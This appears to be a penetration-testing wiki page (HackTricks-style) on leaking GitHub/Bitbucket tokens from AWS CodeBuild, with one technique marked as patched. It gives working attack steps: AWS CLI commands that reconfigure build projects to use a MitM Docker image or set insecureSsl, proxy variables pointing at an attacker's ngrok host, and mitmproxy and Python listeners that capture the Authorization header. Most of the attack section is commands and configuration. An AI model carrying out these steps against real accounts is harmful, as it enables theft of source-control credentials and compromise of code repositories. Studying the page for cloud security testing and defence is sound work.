# AWS Codebuild - Token Leakage

{{#include ../../../../banners/hacktricks-training.md}}

## Recover Github/Bitbucket Configured Tokens

First, check if there are any source credentials configured that you could leak:

```bash
aws codebuild list-source-credentials
```

### Via Docker Image

If you find that authentication to for example Github is set in the account, you can **exfiltrate** that **access** (**GH token or OAuth token**) by making Codebuild to **use an specific docker image** to run the build of the project.

For this purpose you could **create a new Codebuild project** or change the **environment** of an existing one to set the **Docker image**.

The Docker image you could use is [https://github.com/carlospolop/docker-mitm](https://github.com/carlospolop/docker-mitm). This is a very basic Docker image that will set the **env variables `https_proxy`**, **`http_proxy`** and **`SSL_CERT_FILE`**. This will allow you to intercept most of the traffic of the host indicated in **`https_proxy`** and **`http_proxy`** and trusting the SSL CERT indicated in **`SSL_CERT_FILE`**.

1. **Create & Upload your own Docker MitM image**
   - Follow the instructions of the repo to set your proxy IP address and set your SSL cert and **build the docker image**.
     - **DO NOT SET `http_proxy`** to not intercept requests to the metadata endpoint.
   - You could use **`ngrok`** like `ngrok tcp 4444` lo set the proxy to your host
   - Once you have the Docker image built, **upload it to a public repo** (Dockerhub, ECR...)
2. **Set the environment**
   - Create a **new Codebuild project** or **modify** the environment of an existing one.
   - Set the project to use the **previously generated Docker image**

<figure><img src="../../../../images/image (23).png" alt=""><figcaption></figcaption></figure>

3. **Set the MitM proxy in your host**

- As indicated in the **Github repo** you could use something like:

```bash
mitmproxy --listen-port 4444  --allow-hosts "github.com"
```

> [!TIP]
> The **mitmproxy version used was 9.0.1**, it was reported that with version 10 this might not work.

4. **Run the build & capture the credentials**

- You can see the token in the **Authorization** header:

  <figure><img src="../../../../images/image (273).png" alt=""><figcaption></figcaption></figure>

This could also be done from the aws cli with something like

```bash
# Create project using a Github connection
aws codebuild create-project --cli-input-json file:///tmp/buildspec.json

## With /tmp/buildspec.json
{
    "name": "my-demo-project",
    "source": {
        "type": "GITHUB",
        "location": "https://github.com/uname/repo",
        "buildspec": "buildspec.yml"
    },
    "artifacts": {
        "type": "NO_ARTIFACTS"
    },
    "environment": {
        "type": "LINUX_CONTAINER", // Use "ARM_CONTAINER" to run docker-mitm ARM
        "image": "docker.io/carlospolop/docker-mitm:v12",
        "computeType": "BUILD_GENERAL1_SMALL",
        "imagePullCredentialsType": "CODEBUILD"
    }
}

## Json

# Start the build
aws codebuild start-build --project-name my-project2
```

### Via insecureSSL

**Codebuild** projects have a setting called **`insecureSsl`** that is hidden in the web you can only change it from the API.\
Enabling this, allows to Codebuild to connect to the repository **without checking the certificate** offered by the platform.

- First you need to enumerate the current configuration with something like:

```bash
aws codebuild batch-get-projects --name <proj-name>
```

- Then, with the gathered info you can update the project setting **`insecureSsl`** to **`True`**. The following is an example of my updating a project, notice the **`insecureSsl=True`** at the end (this is the only thing you need to change from the gathered configuration).
  - Moreover, add also the env variables **http_proxy** and **https_proxy** pointing to your tcp ngrok like:

```bash
aws codebuild update-project --name <proj-name> \
    --source '{
        "type": "GITHUB",
        "location": "https://github.com/carlospolop/404checker",
        "gitCloneDepth": 1,
        "gitSubmodulesConfig": {
            "fetchSubmodules": false
        },
        "buildspec": "version: 0.2\n\nphases:\n  build:\n    commands:\n       - echo \"sad\"\n",
        "auth": {
            "type": "CODECONNECTIONS",
            "resource": "arn:aws:codeconnections:eu-west-1:947247140022:connection/46cf78ac-7f60-4d7d-bf86-5011cfd3f4be"
        },
        "reportBuildStatus": false,
        "insecureSsl": true
    }' \
    --environment '{
        "type": "LINUX_CONTAINER",
        "image": "aws/codebuild/standard:5.0",
        "computeType": "BUILD_GENERAL1_SMALL",
        "environmentVariables": [
            {
                "name": "http_proxy",
                "value": "http://2.tcp.eu.ngrok.io:15027"
            },
            {
                "name": "https_proxy",
                "value": "http://2.tcp.eu.ngrok.io:15027"
            }
        ]
    }'
```

- Then, run the basic example from [https://github.com/synchronizing/mitm](https://github.com/synchronizing/mitm) in the port pointed by the proxy variables (http_proxy and https_proxy)

```python
from mitm import MITM, protocol, middleware, crypto

mitm = MITM(
    host="127.0.0.1",
    port=4444,
    protocols=[protocol.HTTP],
    middlewares=[middleware.Log], # middleware.HTTPLog used for the example below.
    certificate_authority = crypto.CertificateAuthority()
)
mitm.run()
```

- Finally, click on **Build the project**, the **credentials** will be **sent in clear text** (base64) to the mitm port:

<figure><img src="../../../../images/image (1) (1).png" alt=""><figcaption></figcaption></figure>

### ~~Via HTTP protocol~~

> [!TIP] > **This vulnerability was corrected by AWS at some point the week of the 20th of Feb of 2023 (I think on Friday). So an attacker can't abuse it anymore :)**

An attacker with **elevated permissions in over a CodeBuild could leak the Github/Bitbucket token** configured or if permissions was configured via OAuth, the **temporary OAuth token used to access the code**.

- An attacker could add the environment variables **http_proxy** and **https_proxy** to the CodeBuild project pointing to his machine (for example `http://5.tcp.eu.ngrok.io:14972`).

<figure><img src="../../../../images/image (232).png" alt=""><figcaption></figcaption></figure>

<figure><img src="../../../../images/image (213).png" alt=""><figcaption></figcaption></figure>

- Then, change the URL of the github repo to use HTTP instead of HTTPS, for example: `http://github.com/carlospolop-forks/TestActions`
- Then, run the basic example from [https://github.com/synchronizing/mitm](https://github.com/synchronizing/mitm) in the port pointed by the proxy variables (http_proxy and https_proxy)

```python
from mitm import MITM, protocol, middleware, crypto

mitm = MITM(
    host="0.0.0.0",
    port=4444,
    protocols=[protocol.HTTP],
    middlewares=[middleware.Log], # middleware.HTTPLog used for the example below.
    certificate_authority = crypto.CertificateAuthority()
)
mitm.run()
```

- Next, click on **Build the project** or start the build from command line:

```sh
aws codebuild start-build --project-name <proj-name>
```

- Finally, the **credentials** will be **sent in clear text** (base64) to the mitm port:

<figure><img src="../../../../images/image (159).png" alt=""><figcaption></figcaption></figure>

> [!WARNING]
> Now an attacker will be able to use the token from his machine, list all the privileges it has and (ab)use easier than using the CodeBuild service directly.

{{#include ../../../../banners/hacktricks-training.md}}